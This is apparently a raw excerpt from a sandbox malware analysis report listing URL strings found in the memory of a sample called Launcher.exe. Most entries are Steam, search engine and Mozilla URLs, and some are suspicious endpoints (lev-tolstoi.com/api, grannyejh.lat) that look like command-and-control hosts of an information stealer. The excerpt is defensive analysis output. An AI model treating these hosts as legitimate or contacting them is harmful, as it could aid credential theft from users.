                Source: Launcher.exe, 00000003.00000003.2350321053.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD4000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2346332053.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2482098262.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133076167.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2348231788.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2343830924.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2349091115.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2347665217.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2343011519.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2349767095.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2183979276.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2345580376.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2158039808.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2318603921.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2373792847.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2344743144.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133013260.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000002.2483176433.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2346946917.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                Source: Amcache.hve.6.drString found in binary or memory: http://upx.sf.net
                Source: Launcher.exe, 00000003.00000003.2133076167.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133144596.0000000000FDB000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133013260.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
                Source: Launcher.exe, 00000003.00000003.2319197118.0000000003A1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                Source: Launcher.exe, 00000003.00000003.2319197118.0000000003A1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                Source: Launcher.exe, 00000003.00000003.2159242491.0000000003A0C000.00000004.00000800.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2159305069.0000000003A09000.00000004.00000800.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2159379580.0000000003A09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: Launcher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                Source: Launcher.exe, 00000003.00000003.2342762668.00000000039FA000.00000004.00000800.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2342989032.00000000039FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
                Source: Launcher.exe, 00000003.00000003.2342762668.00000000039FA000.00000004.00000800.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2342989032.00000000039FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
                Source: Launcher.exe, 00000003.00000003.2159242491.0000000003A0C000.00000004.00000800.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2159305069.0000000003A09000.00000004.00000800.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2159379580.0000000003A09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: Launcher.exe, 00000003.00000003.2159242491.0000000003A0C000.00000004.00000800.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2159305069.0000000003A09000.00000004.00000800.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2159379580.0000000003A09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: Launcher.exe, 00000003.00000003.2159242491.0000000003A0C000.00000004.00000800.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2159305069.0000000003A09000.00000004.00000800.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2159379580.0000000003A09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: Launcher.exe, 00000003.00000003.2132890547.0000000000FD4000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133076167.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133013260.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a
                Source: Launcher.exe, 00000003.00000003.2133076167.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133013260.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
                Source: Launcher.exe, 00000003.00000003.2133076167.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133013260.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
                Source: Launcher.exe, 00000003.00000003.2133076167.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133013260.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
                Source: Launcher.exe, 00000003.00000003.2133076167.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133013260.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
                Source: Launcher.exe, 00000003.00000003.2133076167.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133013260.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
                Source: Launcher.exe, 00000003.00000003.2132890547.0000000000FD4000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133076167.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133013260.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                Source: Launcher.exe, 00000003.00000003.2350321053.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD4000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2346332053.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2482098262.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133076167.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2348231788.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2343830924.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2349091115.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2347665217.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2343011519.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2349767095.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2183979276.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2345580376.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2158039808.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2318603921.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2373792847.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2344743144.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133013260.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000002.2483176433.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2346946917.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                Source: Launcher.exe, 00000003.00000003.2132890547.0000000000FD4000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133076167.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133013260.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
                Source: Launcher.exe, 00000003.00000003.2132890547.0000000000FD4000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133076167.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133013260.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=_92TWn81
                Source: Launcher.exe, 00000003.00000003.2132890547.0000000000FD4000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133076167.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133013260.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=hyEE
                Source: Launcher.exe, 00000003.00000003.2133076167.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133013260.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
                Source: Launcher.exe, 00000003.00000003.2133076167.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133013260.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
                Source: Launcher.exe, 00000003.00000003.2133076167.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133013260.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
                Source: Launcher.exe, 00000003.00000003.2132890547.0000000000FD4000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133076167.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133013260.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
                Source: Launcher.exe, 00000003.00000003.2132890547.0000000000FD4000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133076167.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133013260.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
                Source: Launcher.exe, 00000003.00000003.2132890547.0000000000FD4000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133076167.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133013260.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
                Source: Launcher.exe, 00000003.00000003.2133076167.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133013260.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
                Source: Launcher.exe, 00000003.00000003.2132890547.0000000000FD4000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133076167.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133013260.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
                Source: Launcher.exe, 00000003.00000003.2133076167.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133013260.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
                Source: Launcher.exe, 00000003.00000003.2132890547.0000000000FD4000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133076167.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133013260.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=St3gSJx2HFUZ&l=e
                Source: Launcher.exe, 00000003.00000003.2133076167.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133013260.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
                Source: Launcher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
                Source: Launcher.exe, 00000003.00000003.2133076167.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133013260.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en
                Source: Launcher.exe, 00000003.00000003.2133076167.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133013260.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
                Source: Launcher.exe, 00000003.00000003.2133144596.0000000000FDB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/im
                Source: Launcher.exe, 00000003.00000003.2133076167.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133013260.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                Source: Launcher.exe, 00000003.00000003.2133076167.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133013260.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
                Source: Launcher.exe, 00000003.00000003.2133076167.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133144596.0000000000FDB000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133013260.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                Source: Launcher.exe, 00000003.00000003.2133076167.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133144596.0000000000FDB000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133013260.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                Source: Launcher.exe, 00000003.00000003.2133076167.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133013260.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
                Source: Launcher.exe, 00000003.00000003.2133076167.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133013260.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
                Source: Launcher.exe, 00000003.00000003.2132890547.0000000000FD4000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133076167.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133013260.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
                Source: Launcher.exe, 00000003.00000003.2133076167.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133013260.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
                Source: Launcher.exe, 00000003.00000003.2342762668.00000000039FA000.00000004.00000800.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2342989032.00000000039FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                Source: Launcher.exe, 00000003.00000003.2342762668.00000000039FA000.00000004.00000800.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2342989032.00000000039FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
                Source: Launcher.exe, 00000003.00000003.2159242491.0000000003A0C000.00000004.00000800.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2159305069.0000000003A09000.00000004.00000800.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2159379580.0000000003A09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: Launcher.exe, 00000003.00000003.2159242491.0000000003A0C000.00000004.00000800.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2159305069.0000000003A09000.00000004.00000800.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2159379580.0000000003A09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: Launcher.exe, 00000003.00000003.2159242491.0000000003A0C000.00000004.00000800.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2159305069.0000000003A09000.00000004.00000800.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2159379580.0000000003A09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: Launcher.exe, 00000003.00000003.2183979276.0000000000F5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grannyejh.lat:443/api_f
                Source: Launcher.exe, 00000003.00000003.2133076167.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133013260.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
                Source: Launcher.exe, 00000003.00000003.2342989032.00000000039FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                Source: Launcher.exe, 00000003.00000003.2482019704.000000000101D000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133076167.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2183979276.0000000000F90000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2343830924.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2343011519.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2183979276.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2158039808.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000002.2483291933.000000000101D000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2318603921.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133013260.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/
                Source: Launcher.exe, 00000003.00000003.2133076167.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133013260.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/3
                Source: Launcher.exe, 00000003.00000003.2342965816.000000000101B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/5
                Source: Launcher.exe, 00000003.00000003.2133076167.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133013260.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/C
                Source: Launcher.exe, 00000003.00000003.2183979276.0000000000FEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/S
                Source: Launcher.exe, 00000003.00000003.2387068270.0000000000F5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/api
                Source: Launcher.exe, 00000003.00000003.2343011519.0000000000FF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/api1
                Source: Launcher.exe, 00000003.00000003.2345580376.0000000000F5A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2373917806.0000000000F5A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2386728051.0000000000F5A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2482226766.0000000000F5A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000002.2482875381.0000000000F5A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2343011519.0000000000F5A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2387068270.0000000000F5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/api=
                Source: Launcher.exe, 00000003.00000003.2343011519.0000000000FEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apiC
                Source: Launcher.exe, 00000003.00000003.2318603921.0000000000FF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apiP
                Source: Launcher.exe, 00000003.00000003.2133076167.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2133013260.0000000000FDF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000003.2132890547.0000000000FD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apis
                Source: Launcher.exe, 00000003.00000003.2482226766.0000000000F5A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000003.00000002.2482875381.0000000000F5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apis/d
